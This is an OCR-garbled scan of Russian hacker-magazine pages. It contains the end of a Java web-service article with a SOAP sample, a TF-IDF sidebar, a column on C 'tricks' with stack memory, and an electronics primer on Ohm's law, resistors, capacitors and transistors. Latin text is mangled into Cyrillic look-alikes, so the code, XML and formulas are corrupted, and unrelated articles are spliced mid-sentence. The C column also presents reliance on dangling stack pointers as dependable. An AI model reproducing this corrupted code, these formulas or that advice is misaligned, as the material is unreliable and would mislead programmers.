самых разнообразныхтехнологий и языков программирования. Единст- 
венное условие — наличие сетевых средств и способность обрабатывать 
ХМБ-сообщения. 

Как в окне конструктора веб-сервиса, так и в момент отладки ты не мог не 
заметить отображаемые на экране ХМБ-сообщения — запрос клиента и 
ответ сервиса. Все, что тебе теперь нужно сделать, — это написать кли- 
ентское приложение, способное формировать соответствующий запрос 
и разбирать полученный ответ. Если же для создания клиента (неважно, 
оконного или с веб-интерфейсом] ты остановишься на том же языке ^ѵа 
и будешь создавать его в той же ЮЕ ЫеГОеапБ, то весь процесс потребует 
оттебя буквально несколько кликов мышкой. Автоматизация, брат. 

На всякий случай в качестве примера на диске мы выложили не только 
исходный код веб-сервиса, но и исходный код клиента. 

Собственно, это все, что я собирался тебе сегодня рассказать. Мораль 
сей басни такова: если руки растутиз правильного места и есть желание, 
то всегда можно обойтись своими силами, а сэкономленные на покупке 
софта деньги потратить на женщин и карты. Агііоаі тг 



Релевантность 

Релевантность (англ. геІеѵапО применительно к результатам работы 
поисковой системы — степень соответствия запроса и найденного 
ответа, уместность результата. 

Основным методом оценки релевантности является ТР-ГОР — метод, 
который используется в большинстве поисковых систем (как в интер- 
нет-поисковиках, таки в справочных системах (МЗБЫ)) . Его смысл 
сводится к следующему: чем больше локальная частота термина 
(запроса) в документе (ТР) и «редкость» термина (то есть чем реже он 
встречается в других документах) в коллекции (ГОР), тем выше вес это- 
го документа по отношению к термину, то есть документ в результатах 
поиска по этому термину будет выдаваться раньше. Автором метода 
является Сегагб Закоп (в дальнейшем он был доработан Кагеп Зрагск 
іопез). 



Структура 

ХМЕ-ответа 

<?хш1 ѵег8Іоп= " 1 . О " епсосІіпд= "ІІТР-8 " ?> 

<зоар : Епѵеіоре хшіпз : зоар="Ы:Ър: //зсііешаз .хтізоар. 
огд/зоар/епѵеіоре/ " > 

<зоар:ВосІу> 

<пзО : соипДКезропзе 

хшіпз : пзО= "ЪРЬр : / / огд . кѵ7б . Ѵ73 / " > 
<гекигп>затр1е Еех1:</ге1:игп> 

</пзО : соипДКезропзе> 

</зоар : Во<Эу> 

</зоар : Епѵе1оре> 
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КРИС КАСПЕРСКИ 



ТРЮКИ ■ 
ОТ КРЫСА 




Сегодня у нас несколько необычный выпуск — своеобразный юбилей. Если перевести 



номер в шестнадцатеричную систему (забыв о том, что он уже записан в ней], мы получим 



глости» которого сомневаться не приходится. Ошибка?! Конечно! Вот 



и поговорим об ошибках, которые только с виду ошибки, а на самом деле — интересные 



хакере кие трюки, срывающие крышу даже опытным программистам. Короче, мы немного 



май показывать описанные трюки ни преподавателям, ни работода- 



Возврат указателей на локальные переменные 



-’ассмотрим следующий исходный код, вполнетипичныи для начи- 
нающих, и попробуем ответить — что в нем неправильно? (см. ниже) 

сііаі *боо ( : а, іпЬ Ь) 



сііаг Ьиб [ 69 ] ; 

іб (а — Ь) зСгсру (Ьиб , "пегиші " ) ; 
еізе зСгсру (Ьиб , "зоигіг " ) ; 

геСигп Ьиб ; 

// «< трюк? или... ошибка? или все-таки трюк?! 



шаіп(іп1: с, сііаі **ѵ) 

{ 

сііаг *з, *р ; іі (с < 3) гебигп 0; 
з = Іоо (абоі (ѵ[1] ) , абоі (ѵ[2] ) ) ; 

іі (збгсшр(з, "зоигіг")) р = "заріізіі"; 

еізе р = "бгапдіаіз"; 

ргіпШ ( " %з — іб ' з %з\п" , з , р) ; 

/ / мы не освобождаем з , так как она указывает на ло- 
кальную переменную 
} 

Ага! Уже раздаются крики: «Возвращать указатели на локальные перемен- 
ные ни в коем случае нельзя, поскольку они автоматически уничтожаются 
при выходе из функции. Это же в каждом букваре по Си написано! Ну 
сколько можно говорить...» 

Хм, тогда кто рискнет объяснить, почемуже, несмотря на буквари, данный 
код стабильно работает, независимо от версии компилятора, и совместим 
со всеми операционными системами из линейки ЫТ, І_іпих, В5й? 

Фокус втом, что при завершении функции локальные переменные не 
уничтожаются, а освобождаются. Указатель стека опускается вниз, и они 
оказываются в свободной зоне, которую может использовать кто угодно, 
например, обработчик аппаратного прерывания, однако ІЧТ, І_іпих и В5й 



сконструированы так, что на стек потока никто не покушается — только он 
сам. При прерывании регистры сохраняются на стеке ядра. Стек потока 
остается в неприкосновенности, а потому после завершения функции 
содержимое пользовательского стека не может быть «стихийно» разруше- 
но (ктомуже каждый поток имеетсвой стек и друг другу они не мешают). 
Исключение составляет 9х, «засоряющий» пользовательский стек без его 
ведома и согласия, что, кстати говоря, осложняет разработку некоторых 
видов ехріоіі’ов. 

Естественно, при вызове любой функции сохранность освобожденных 
переменныхуже не гарантируется — все зависит оттого, сколько стекового 
пространства «кушает» очередная вызываемая функция, причем некото- 
рые функции могут вызываться неявно (мало ли что захочется воткнуть в 
код компилятору!). Ктомуже стекактивно используется для временного со- 
хранения регистров, заталкиваемыхтуда компилятором. То есть гарантий, 
что освобожденные переменные не будут уничтожены у нас все-таки нет, 
однако, если предпринять ряд предосторожностей, то риск будет не та к уж 
и велик. Стек растет вверх, а локальные буфера вниз. Выделяя локальный 
буфер с запасом хотя бы в пару килобайт, мы на 99% обезопасим себя от 
затирания актуальных данных. 

Конечно, в «промышленном» коде подобныетрюки недопустимы и нужно 
выделять память из кучи (благополучно забывая ее потом освободить). Во 
многих случаях возвратуказателей на локальные переменные происходит 
по ошибке. Такие ошибки могут «дремать» в коде годами, неожиданно 
пробуждаясь при модификации программы или перекомпиляции ее дру- 
гим компилятором, или с новой версией такой-то библиотеки. Как пример, 
одна из библиотечных функций увеличила свою потребность в стеке и 
стала затирать освобожденные переменные, приводя программу к краху, 
источник которого не так-то просто обнаружить. 



02 



Выделение памяти из стека 



]Учебники по Си упоминают о трех основных типах памяти, доступ- 
ных программисту: автоматическая стековая память, динамическая память 
(куча) и статическая память (секция данных). Автоматическая память хо- 
роша тем, что гарантированно освобождается компилятором по выходе из 
функции, исключая возможность утечек. Однако стековый кадр формирует- 
ся в момент вызова функции и потому размеры локальных буферов задают- 
ся на стадии компиляции, что не позволяетзаранее обрабатывать данные 
неизвестного размера, ктомуже мы не можем (легальным образом) воз- 
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вращать указатели на автоматические переменные материнской функции. 
Куча снимаетэти ограничения, но перекладываетзаботы об освобождении 
памяти на плечи программиста и, как результат, малейшая небрежность 
ведет ктрудноуловимым утечкам. Статическая память наследует худшие 
черты кучи и стека — размеры буферов задаются на стадии компиляции и не 
могутбыть увеличены во время исполнения программы. 

Но есть еще и четвертый тип памяти, о котором умалчиваютучебники. Это 
память, лежащая вышеуказателя стека. Почему бы ее не использовать для 
хранения динамических данных? Естественно, со всеми предосторожнос- 
тями, упомянутыми выше. Дальше приведен код функции, выделяющей за- 
данное количество килобайт стековой памяти и возвращающей указатель 
на обозначенный блок памяти: 

ДИНАМИЧЕСКИЙ СТЕКОВЫЙ АЛЛОКАТОР 

(УПРОЩЕННЫЙ «МАКЕТНЫЙ» ВАРИАНТ) 

сЬаг* збаск_а11ос ( іпб з_г) { 
сЬаг Ьиб [1024] ; 

іб ( в 2 ) гебигп збаск_а11ос ( з _2 — 1) ; 

гебигп Ьиб; 

} 



пожалуй, и не найти. Основная трудность заключается в том, что мы не 
можем управлять размещением переменных в стеке. Обычно компиляторы 
располагаютих в порядке обращения к ним, при этом часть переменных 
попадает в регистры, а часть нет. Другими словами, если у нас больше 
одной переменной — жди проблем. Или же закладывайся на особенности 
поведения конкретной версии компилятора с заданным набором ключей 
трансляции. 

Приведенный ниже код достаточно надежен и дружите оптимизаторами, 
для достижения чего пришлось круто извратиться с глобальными перемен- 
ными, расплачиваясь наглядностью кода. Зато теперь можно быть на 99% 
уверенным, что компилятор не создаст никаких «служебных» локальных 
переменных, смещающих кадр стека — ведь нам надо добиться, чтобы пе- 
ременная Ьиі 1 функции Ьаг() легла в аккуратповерх переменной Ьік функции 
1юо(]. Увы, никакие извращения не дают 1 00% гарантии. Компилятор — это 
черный ящики никто не знает, что у него науме. 

РАБОЧИЙ ПРИМЕР С НЕЯВНОЙ ИНИЦИАЛИЗАЦИЕЙ 

ЛОКАЛЬНЫХ ПЕРЕМЕННЫХ 

іпЬ а, Ь, с, (3; 

#сіебіпе 3 "пегиші Ьаз уои!\п" 



Несколько замечаний. Во-первых, никакой это не аллокатор, поскольку 
реального выделения памяти не происходит, и она остается свободной. 
Повторный вызов функции «выделит» новый блок поверх старого (естест- 
венно, при желании этот недочетлегко обойти, передав функции базовый 
адрес, с которого начинается «выделение» очередного блока). 

Во-вторых, размер выделенного блока всегда чуть больше требуемого, так 
как в стеке кроме буфера сохраняются регистры и адреса возврата — но 
это не проблема. Напротив, определенный запас размера снижаетриск 
«стихийного» затирания данных. 

В-третьих, оптимизирующие компиляторы наверняка избавятся и от 
хвостовой рекурсии, и от реально неиспользуемого буфера Ьиб а потому эта 
функция вообще не будет выделять никакой памяти и вернетуказатель черт 
знает на что (более точно сказать невозможно, это уже оттипа компиля- 
тора и ключей компиляции зависит!). Значит нужно переписать функцию 
так, чтобы компиляторы не смогли «развернуть» рекурсию и нетрогали 
буфер ЬіЛ (для этого достаточно «загрузить» его работой, имитируя бурную 
деятельность). 

И последнее — не стоит принимать стековой аллокатор всерьез. Это шутка! 
Но иногда она оказывается очень полезной («заложить» ее в «промыш- 
ленном» коде перед увольнением с работы, чтобы кому-то потом сильно 
аукнулось — не предлагаю!). 



Неявная инициализация стековых переменных! 



|А вот этоттрюк используют для запутывания кода, что полезно при 
создании защитных механизмов. Идея заключается в следующем: вызыва- 
ем функции іоо(), которая что-то записывает в свои собственные локальные 
переменные, а потом завершается. Указатель стека опускается, но содер- 
жимое самих переменных остается нетронутым. Если теперь запустить 
функцию Ьаг(),то в ее локальных переменных (неинициализированных, 
конечно) окажутся значения, оставленные функцией іюо(]. 

В большинстве случаев это происходит по ошибке, но если немного по- 
думать и все рассчитать — луч ш его трюка для скрытой передачи данных, 




// функция боо ( ) инициализирует переменную Ьиб, 

//а затем завершает свое выполнение 
боо ( ) 

{ 

сЪаг Ьиб[0хб0] ; б. = збг1еп(5) ; 
бог (а = 0; а <= сі; а++) 

{ 

с = 3 [ а ] ; Ьиб [ а ] = с ; 

} 

гебигп Ьиб [а] ; 

} 

// функция Ъаг ( ) , вызываемая следом за функцией боо ( ) , 
// объявляет переменную Ьиб и выводит ее на экран, 

// «подхватывая» содержимое, оставленное в стеке 
// функцией боо ( ) , создавая иллюзию того, что 
// переменная Ьиб не инициализирована 
Ьаг ( ) 

{ 

сЬаг Ьиб [0x60] ; 
ргіпбб (Ьиб) ; 

} 

шаіп ( ) 

{ 

боо ( ) ; 

Ьаг ( ) ; 

ргіпбб ("***\п" ) ; /* если убрать этот вызов то оптими- 
затор может заменить саіі Ьаг на зшр Ьаг, что сдвинет 
стековый фрейм функции Ьаг */ 

} 
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ЭЛЕКТРОННЫЕ 
ИСХОДНИКИ 



Базовые основы электроники 



ля самых маленьких 



Надеюсь, ты понимаешь, что тупо повторять железки, увиденные в инете 
или на страницах нашего издания, это моветон и тупиковый путь. Конеч- 
но, можно наломать дров и так, но настоящий фрикер должен непрерывно 
совершенствоваться и развиваться сам. Именно поэтому мы с Длинным не 
даем полностью завершенных и функциональных девайсов, оставляя про- 
стор для творчества и дальнейших модернизаций. 



читься, учиться и еще разучиться! Недаром говорят, что 
лучший способ освоить программирование — взять дебаггер и 
п о с м отр еть , ка к это дела ют другие. Тут точно та кая же с итуа ц и я . 
Поэтому статью я посвящу не конкретному устройству, а базовым 
знаниям электроники и простейшим схемотехническим элементам, и в 
качестве примеров, с целью вскипятить тебе мозг, я буду брать фрагменты ре- 
альных принципиальных схем. А чтобы лучше усваивалось, доставай макетку 
и разогревай паяльникили запускай 1515 Ргоіеив. 

г ЭЛЕКТРОТЕХНИКА ДЛЯ ВСЕХ 

Довелось мне однажды преподавать электронику в одной шараге. Нетриви- 
альное занятие, скажу я тебе. Дабы облегчить усвоение материала, я вводил 
ряд упрощений. Совершенно бредовых и антинаучных, но более-менее 
наглядно показывающих суть процесса. Методика «канализационной 
электрики»успешно показала себя в полевых испытаниях, а посему будет 
использована итут. Хочу обратить внимание, что это всего лишь наглядное 
упрощение, справедливое для общего случая и конкретного момента, и к 
реальной физике процесса не имеющее практически никакого отношения. 



Зачем оно тогда? А чтобы проще запомнить, что к чему, и не путать напряже- 
ние и ток, и понимать, как на все это влияетсопротивление, а то я от студентов 
такого наслушался... 

г ТОК, НАПРЯЖЕНИЕ, СОПРОТИВЛЕНИЕ 

Если сравнить электроцепь с канализацией, то источник питания — это 
сливной бачок, текущая вода —ток, давление воды — напряжение, а несу- 
щиеся потрубам фекалии — полезная нагрузка. Чем выше сливной бачок, 
тем больше потенциальная энергия воды, находящейся в нем, и тем сильнее 
будет напор-ток, проходящий потрубам, а значит, больше дерьма-нагрузки 
он сможет смыть. 

Кроме дерьма, потоку препятствуеттрение о стенки труб, образующее потери. 
Чем толще трубы, тем меньше потери (гы-гы-гы,теперьты понимаешь, поче- 
му аудиофилы для своей мощной акустики берутпровода потолще). 

Итак, подведем итог. Электроцепь содержит источник, создающий между 
своими полюсами разность потенциалов — напряжение. Поддействием 
этого напряжения ток устремляется через нагрузку туда, где потенциал 
ниже. Движениютока препятствует сопротивление, образуемое из полезной 
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нагрузки и потерь. В результате напряжение-давление ослабеваеттем 
сильнее, чем больше сопротивление. Ну, теперь положим нашу канализацию 


либо полезной нагрузки, то мощность, выпадающая в него, 
это потери в чистом виде . В этом случае мощность через 


в математическое русло. 


закон Ома можно выразить так: 
Р = КІ 2 


>І< ЗАКОН ОМА 




Сила тока в цепи пропорциональна напряжению и обратно 


Как видишь, увеличение сопротивления вызываетувеличение мощности, 


пропорциональна полному сопротивлению цепи : 

I = и/к 


расходующейся на потери, а если возрастаетток, то потери увеличиваются в 
квадратичной зависимости. В резисторе вся мощьуходит в нагрев. По этой 


Ы — величина напряжения в вольтах 


же причине, кстати, аккумуляторы нагреваются при работе — у них есть внут- 


К — сумма всех сопротивлений в Омах 


реннее сопротивление, на котором и происходит рассеяние части энергии. 


I — протекающий по цепи ток 


Есть еще закон полного тока в цепи. На практике, правда, он мне никогда не 
пригождался, но знать его не помешает, поэтому утяни из сети учебник поТОЭ 


Для примера просчитаем простейшую цепь, состоящую изтрех сопротив- 
лений и одного источника. Схему я буду рисовать не так, как принято в учеб- 
никах поТОЭ, а ближе к реальной принципиальной схеме, где принимают 
точку нулевого потенциала — корпус, обычно равный минусу питания, а плюс 
считаютточкой с потенциалом, равным напряжению питания. Для начала 
будем считать, что напряжение и сопротивление известны, а значит, нам нуж- 
но найти ток. Сложим все сопротивления (о правилах сложения сопротивле- 
ний читай на врезке), дабы получить общую нагрузку, и поделим напряжение 
на получившийся результат — ток найден! Теперь посмотрим, какраспреде- 
ляется напряжение на каждом из сопротивлений. Выворачиваем закон Ома 


(теоретические основы электротехники), лучше для среднихучебных заведе- 
ний, там все гораздо проще и понятней — без ухода в высшую математику. А я 
пока пробегусь по основным элементам цепи. 

0 РЕЗИСТОР 

Он же сопротивление. На схеме выглядит какбелый узкий прямоугольник (на 
буржуйских схемах часто обозначен угловатой пружинкой). Замечательная 
деталь! Отличается тем, что не делает вообще ничего. Тупо потребляет энер- 
гию и греется. Основное предназначение в схеме это либо токоограничение, 
либо перераспределение напряжения. Сейчас поясню. Вот, например, 


наизнанку и начинаем вычислять. 


светодиод. Для работы ему нужен мизерный ток, порядка 20 миллиампер, но 
вот беда — сопротивление светодиода мало, поэтому если воткнуть напрямую 


и=ік 


в 5 вольт, то через него ломанется ток в 400 миллиампер. Оттакой нагрузки 
бедняжка пожелтеет, позеленеет, а потом и вовсе загнется, источая вонь. Что 


Поскольку ток в цепи един для всех последовательных сопротивлений, 
то он будет постоянен, а вот сопротивления будут разные. Итогом стало, 
что 1) источника = ^1 + ^2 + ^3- Исходя из этого принципа, можно, например, 
соединить последовательно 50 лампочек, рассчитанных на 4.5 вольта, и 
спокойно запитать от розетки 220 вольт — ни одна лампочка не перегорит. 
А что произойдет, если в эту связку, в серединку, всандалить одно здоро- 
венное сопротивление, скажем на кОм, а два других взять поменьше — на 
один Ом? Из расчетов станетясно, что почти все напряжение выпадет на 
этом большом сопротивлении. 


делать? Правильно — поставить ему последовательно резистор, чтобы тот 
ограничил ток, не пустив излишнюю мощу на хилый диодик. Даже если диод 
теперь закоротить, то, исходя из закона Ома, ток в цепи не превыситтого, 
который разрешит резистор. 

Второе популярное применение — это делители напряжения. Цель делителя 
— подать на какую-либо точку сети строго определенное напряжение. 

Часто приходится это делать при согласовании между сигналами разных 
напряжений. Делитель представляет собой два последовательно соединен- 
ных резистора, один из которых подсоединен кточке нулевого потенциала 
(корпус), а второй к напряжению, которое нужно поделить. Средняя точка 


0 ЗАКОН КИРХГОФФА 

Согласно этомузакону, сумматоков, вошедших в узел, равна нулю, причемтоки, 
втекающие в узел, принято обозначать с плюсом, а вытекающие — с минусом. 
По аналогии с нашей канализацией — вода из одной мощной трубы разбегает- 
ся по мелким. Данное правило позволяет вычислять примерный потребляемый 
ток, что иногда бывает необходимо при расчете принципиальных схем. 


между резистором — это выход нашего поделенного напряжения. Ток в 
последовательной цепи везде одинаков, а вот сопротивление разное, значит, 
напряжение (по закону Ома) разделится на резисторах пропорционально их 
сопротивлениям. Одинаковые резисторы — напряжение пополам, а если нет, 
то уже надо садиться и вычислять, где как. Приведем простой пример. 
Напряжение порта Н5232 в компьютере 12 вольт, а для программирования 
микроконтроллера требуется всего 5 вольт. Тем не менее, простейший 


г МОЩНОСТЬ И ПОТЕРИ 

Мощность, которая расходуется в цепи, выражается, как произведение 


программатор для СОМ порта, найденный на сайтеаѵг.пікоіаеѵѵ.огд, не 
требует каких-либо специализированных микросхем преобразователей. Там 


напряжения наток. 


стоятобычные делители, которые 12 вольт преобразуют в 6 вольт, что уже не 
смертельно для контроллера (на самом деле, вольт не 12, а 1 1 ,5, так как еще, 


Р = и * I 


минимум, 0.5 вольта упадет на диоде). 


Потому , чем больше ток или напряжение , тем больше мощ- 
ность. Так как резистор (или провода) не выполняет какой- 


Надо учитывать, что делитель работаетлишь в том случае, если напряжение 
с него снимается на нагрузку, сопротивление которой в разы — а лучше, в по- 



Как вычислять общее 
сопротивление цепи? 



Если резисторы идут один за другим, последовательно, то просто 
складываешь их сопротивление. Если же они включены параллель- 
но, то суммарное сопротивление будет равно: 

1 / к с У ммы = 1 /к 1 + 1 /а 2 + 1 /а 3 +..+ 1 /к п 

Конденсаторы складываются несколько иначе. Суммарная емкость 
батареи конденсаторов при последовательном включении будет 


І/Ссуммы - 1/С 1 + 1/С 2 + 1/С 3 + .. + 1/С п 
А при параллельном: 

^ суммы = С 1 + С 2 + С 3 + -- + С п 

Индуктивности складываются так же, как и сопротивления. Пос- 
ледовательное соединение вызывает сложение индуктивностей, а 
параллельное соединение будет вычисляться по формуле: 


равна: 


!/^уммы = 1/Ьі + 1/Ь2+1/Ьз + ” + 1 /Ц 
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Аналоговая электроника — жутко замороченная штука, но когда работает, как 
надо, это песня! 



Катушка, а также 



Цифровая схемотехника. Обозначение в качестве ру- 
бильников совершенно условное, на самом делетам 
конечноже, стоиттранзистор, обычно полевой 
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рядки — выше сопротивления делителя. Как правило, это входы микросхем, 
имеющих сопротивление в десятки МегаОм. 

Еще один пример применения резисторов — подтяжка, она же риііир. Дело 
втом, что раз входы микросхем имеютогромное сопротивление, то на них 
наводится куча помех буквально из воздуха, следовательно, значение на 
входе может принимать совершенно случайный вид. Поэтому неиспользо- 
ванные входы сажают на землю либо через резистор подтягивают к плюсу, 
чтобы там было определенное напряжение: или ноль, или плюс питания, 
соответственно. Если собирал мои прошлые девайсы на АѴП.то, навер- 
ное, помнишь, что сигнал ВЕЗЕТ я подтягивал резистором к напряжению 
питания. Можно, конечно, просто припаять ВЕЗЕТ к плюсу, нотогда ты не 
сможешь сбросить процессор подведением туда земли — вызовешь корот- 
кое замыкание между плюсом и минусом. Ас подтягивающим резистором 
этот фокус пройдет на ура, слабый подтяг вывода ВЕЗЕТ до плюса будет 
пересилен прямым замыканием на минус, и произойдетсброс. 

^ КОНДЕНСАТОР 

Он же емкость — еще один вид пассивных элементов. На схеме обозначен, 
какдве одинаковые параллельные черточки. В отличие от резистора, кон- 
денсатор — это нелинейный элемент. По нашей канализационной аналогии 
его можно сравнить с резиновым баком. Вначале, когда он пуст, вода резко 
его заполняет, растягивая стенки. Постепенно, когда стенки растянутся до 
предела, его сопротивление возрастет настолько, что поток воды остано- 
вится. А если убрать внешнее давление, то хлынет обратно. 

Таки электрический конденсатор: когда он не заряжен, то его сопротивле- 
ние можно принять за равное нулю, а когда зарядится, то — за бесконеч- 
ность, обрыв. Токчерез него и дет только л ишь в момент заряда или разряда. 
После отсоединения источника тока конденсатор сам начинает действо- 
вать как источник, пока не разрядится. 

Конденсаторы в электронике, в основном, используют как фильтрующие 
элементы, удаляющие помехи. Здоровенные конденсаторы на силовых цепях 
в блоках питания служат для подпитки системы при пиковых нагрузках, сгла- 
живая просадки напряжения. Основан этотэффектнатом, что конденсатор не 
пропускает постоянный ток, но переменная составляющая через него проходит 
на ура. Сопротивление конденсатора переменной составляющей тока зависит 
отчастоты этой составляющей. Чем выше частота, тем меньше сопротивление 
конденсатора. В итоге, все высокочастотные помехи, идущие поверх посто- 
янного напряжения, глушатся через конденсатор на землю, оставляя после 
себя постоянное напряжение. Сопротивление конденсатора переменной 
составляющей также зависит отемкости кондера, поэтому, ставя конденсаторы 
с разной емкостью, можно отсеять разные частоты. 

Емкостное сопротивление рассчитывается так: 

Х с = 1/ЫС 




ІЬ 



Где Хс — емкостное сопротивление в Омах 
С — емкость в фарадах 

СО — угловая частота переменной составляющей в радиан/ с 

(л) = П Е 

где Е — частота колебаний сигнала в герцах 



Конденсатор может служить еще и времязадающим элементом в 
генераторах разного рода — от него будетзависеть частота генерации. 
Либо использоваться в качестве формирователя импульса, как пример, 
сброс в схемах на контроллере с инверсным Везеі: (мой любимый 
АТ89С51 ). Основан прикол на том факте, что конденсатор пропускает 
постоянный токтолько в период заряда. Значит, если подключить ин- 
версный гезеі через конденсатор на плюс, а через резистор на землю, 
то в начальный момент, пока конденсатор не заряжен, на гезеі будет по- 
дан плюс питания (так как незаряженный конденсатор — это почти ко- 
роткое замыкание). Потом, когда конденсатор зарядится и превратится 
в обрыв, ножка гезеі окажется через резистор на земле. Получается, во 
время пуска на ножке гезеі будет кратковременный импульс положи- 
тельного напряжения, достаточный для первичного сброса процессо- 
ра. Таким образом, например, поступили в схеме программатора для 
АТ89С51 с сайта ЬирѴАллллл/.аіргоа.Ьоот.ги/зсЬргоа.бігпІ.. 




В ИНДУКТИВНОСТЬ 

В народе катушка, грубо говоря, это кусок проволоки, намотанный 
на каркас. В группу входят и дроссели, и разного рода фильтры, и 
некоторые антенны. Также индуктивностью обладает все, что имеет 
обмотку, например двигатели или электромагниты, несмотря на то, 
что это не главное их свойство. Помни об этом при проектировании 
цепей. Увязать индуктивность в нашу канализационную теорию было 
нелегко, но, немного пораскинув мозгами, мы таки придумали. В 
гидро модели катушка похожа на турбину с неслабой инерцией, где 
величина инерция является прообразом индуктивности. На стабиль- 
но текущий потоктурбина, будучи раскрученной этим же потоком, не 
влияет никак, но стоит потоку ослабнуть, кактурбина начнетза счет 
инерции подталкивать его. И наоборот, если турбина остановлена, 
то при появлении потока она будет его тормозить, пока не раскрутит- 
ся. Чем больше инерция, тем сильнее будет сопротивление потоку. 
Примерно так катушка индуктивности препятствует изменению тока, 
протекающего через нее. 

Основное применение катушка находит в колебательных контурах 
генераторов и фильтрах, так как она имеетсвойство пропускать через 
себя постоянную составляющую и подавлять переменную. В паре с 
конденсатором они образуют отличный Г-образный или П-образный 
фильтр. 
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Закон Ома 
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а диод 

Основные пассивные элементы рассмотрели, теперь бегло расскажем про 
полупроводники. 

Первым в списке будет диод. Это такая хитрая фиговина, пропускающая 
токтолько в одну сторону. Его можно сравнить с ниппелем. Применяется, 
например, в выпрямителях, когда из переменного тока делают постоянный. 
Или когда надо отделить обратное напряжение от прямого. Погляди в схему 
программатора (там, где был пример с делителем). Видишь, стоят диоды, 
как думаешь, зачем? Все просто. У микроконтроллера логический нуль 
— это около 0 вольт, а у СОМ порта нуль — минус 1 2 вольт. Вот диод и отрезает 
этот минус 12, образуя 0 вольт. А поскольку у диода в прямом направлении 
проводимость неидеальная, то на его сопротивлениеупадетпримерно 
0.5-0. 7 вольта. Остаток, будучи поделенным резисторами надвое, окажется 
примерно 5.5 вольт, что не выходитза пределы нормы контроллера. 

Есть еще один интересный тип диода — стабилитрон. Я юзал его в одной 
из прошлых статей. Особенностью стабилитрона является, что в прямом 
направлении он работает как обычный диод, а вот в обратном его срывает 
на каком-либо напряжении, например, на 3.3 вольта, подобно ограни- 
чительному клапану парового котла, открывающемуся при превышении 
давления и стравливающему излишки пара. Стабилитрон используют, 
когда хотят получить напряжение заданной величины, вне зависимости 
от входных напряжений. Это можетбыть, к примеру, опорная величина, 
относительно которой происходитсравнение входного сигнала. Им можно 
обрезать входящий сигнал до нужной величины или использовать его как 
защиту. В своих схемах я часто ставлю на питание контроллера стабилит- 
рон на 5.5 вольт, чтобы в случае, если напряжение резко скакнет, стабилит- 
рон стравил через себя излишки. Также есть такой зверь — супрессор, тот 
же стабилитрон, только двунаправленный. Используется для защиты по 
питанию. 




нципиальная 



ница только в на- 



правлении тока» 



г транзистор 

Жуткая вещь, в детстве все не мог понять, какой 
работает, а оказалось, очень просто. 

В общем, транзистор можно сравнить с вен- 
тилем, при помощи которого мы небольшим 
усилием управляем мощнейшим потоком. Чуть 
повернул — и тонны дерьма умчались потрубам, 
открыл посильней — и вотуже все вокругзахлеб- 
нулось в нечистотах. Выход пропорционален 
входу, умноженному на какую-то величину. Этой 
величиной является коэффициентусиления. 

Транзисторы делятся на полевые и биполярные. 

В биполярном есть эмиттер, коллектор и база 
(смотри рисунок). Между эмиттером и коллекто- 
ром идет большой ток полезной нагрузки, на- 
правление которого определяется стрелочкой на 

эмиттере. А вот между базой и эмиттером идет маленький управляющий ток. 
Грубо говоря, величина управляющего тока влияет на сопротивление между 
коллектором и эмиттером. Биполярныетранзисторы бывают двух типов: р- 
п-р и п-р-п, принципиальная разница только в направлениитока. 

Полевой транзистор отличается отбиполярного тем, что в нем сопро- 
тивление канала между истоком и стоком определяется уже не током, а 
напряжением на затворе. Так кактоки в них протекают микроскопичес- 



Обозначение 

транзисторов 

Как запомнить тип биполярного транзистора по его условной схе- 
ме? Представь, что стрелочка — это направление твоего движения 
на машине. Если едем в стенку, то слышится дружный вопль: «Писец 

— Нам — Писец» ( р-п-р) . А если от стенки, то — облегченное: «Не 

— Писец — Нам» (п-р-п). Все просто! Мнемотехника форева! 



«Биполярные 
транзисторы быва 
ют двух типов: 



Диод, стабилитрон, супрессор и прочая кремниевая мелюзга 



кие, решающую роль играет напряжение, а значит потери и тепловыде- 
ление минимальны. Последнее время полевыетранзисторы получили 
завидную популярность (на них построены все микропроцессоры). 

Короче, транзистор позволиттебе слабеньким сигналом, например, с ноги 
микроконтроллера, управлять мощной нагрузкой типа реле, двигателя 

или лампочки. Если не хватитусиления одного 
транзистора, их можно соединять каскадами 
— один за другим, все мощней и мощней. А по- 
рой хватает и одного могучего полевого М05РЕТ 
транзистора. Посмотри, как в схемах сотовых 
телефонов управляется виброзвонок. Там выход 
с процессора идет на затвор силового М05РЕТ 
ключа. 



г МИКРОСХЕМЫ — КУБИКИ НАШЕГО 
КОНСТРУКТОРА 

Диоды, резисторы, транзисторы и конденса- 
торы — это так, лишь обвязка. Особо на них не 
развернешься (нет, маньяки, конечно, могут, но 
габариты устройств будутфеерические). Самое 
вкусное нас поджидаете микросхемах. 

Делятся они на цифровые и аналоговые. Для 
начала кратко по цифровым микросхемам. 



В МИРОМ ПРАВИТ ЦИФРА! 

Краеугольным камнем цифровой схемотехники служит понятие нуля и еди- 
ницы. Понятие совершенно условное, потому как фактически нет никакого 
нуля и единицы нет, естьлишьуровни напряжения — высокий и низкий, а 
также некий порог, после которого данный уровень напряжения принято 
считать высоким или низким. Скажем, все, что ниже 0.7 вольт, считаем за 
низкийуровень(О), все, что выше 2.4 вольт— высоким (1). Между0.7 и 2.4 
вольта, когда неясно, какой уровень — получаем третье состояние, неопре- 
деленное, и на выходе в таком случае результат непредсказуем. 
Сопротивление входов очень высокое, практически можно считать его 
бесконечным. 

Выход в микросхеме бывает разныхтипов. Различают РизЬ-РиІІ и Ореп Огаіп 
(в нашей литературе второй тип называют«открытым коллектором» или 
«ОК»). Отличие заключается в способе выдачи сигнала на выход. В РизЬ-РиИ, 
когда нужен низкий уровень, выход беспрекословно сажается на землю, име- 
ющую нулевой потенциал, а когда высокий, то на напряжение питания. 

В открытом коллекторе все обстоит несколько иначе. Когда нам надо полу- 
чить низкий уровень, мы тупо сажаем ногу на землю, а вотвысокийуровень 
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Транзистор — как упр; 



авляемыи вентил 



получаем подтягивающим резистором (риііир), который, в отсутствии 
посадки на землю и большого сопротивления висящей на выходе нагруз- 
ке, заводит на ногу высокий потенциал. Тут можешь вспомнить закон Ома 
и посчитать, какое будет напряжение выхода на открытом коллекторе, 
если подтягивающий резистор обычно порядка 1 кОм, а сопротивление 
входа больше 1 МегаОм. Тип выхода определяется из документации на 
микросхему, некоторые микрухи имеют программируемый выход, напри- 
мер, все контроллеры АѴР. Исходя из этого, становится понятен смысл 
регистров Рогі и БйР в контроллере АѴР — они определяюттип выхода 
Ореп Огат+РиШр, РизЬ-РиІІ или просто Ореп 
Бгаіп. 

О микросхемах дискретной логики И, ИЛИ, НЕ 
рассказывать не буду, описать каждую — это 
справочникне на одну сотню страниц. Да и они 
постепенно уходят в прошлое, вытесняемые 
контроллерами и программируемыми матрица- 
ми. Скажу лишь одно — работаютэти микро- 
схемы по жесткой таблице истинности, которую 
